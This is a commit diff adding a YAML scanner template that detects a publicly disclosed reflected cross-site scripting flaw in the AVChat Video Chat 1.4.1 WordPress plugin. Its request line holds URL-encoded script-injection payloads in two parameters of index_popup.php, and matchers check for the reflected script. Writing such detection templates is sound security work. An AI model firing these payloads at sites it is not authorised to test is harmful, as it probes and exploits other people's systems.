commit
3ef2eea48f
|
@ -0,0 +1,36 @@
|
|||
id: avchat-video-chat-xss
|
||||
|
||||
info:
|
||||
name: AVChat Video Chat 1.4.1 - index_popup.php Multiple Parameters Reflected XSS
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
The Community Lite Video Chat WordPress plugin was affected by an index_popup.php Multiple Parameters Reflected XSS security vulnerability.
|
||||
reference:
|
||||
- https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
|
||||
- https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
|
||||
metadata:
|
||||
verified: true
|
||||
tags: wordpress,wp-plugin,xss,,wp
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="FB_appId"><script>alert(document.domain)</script>"'
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'text/html'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue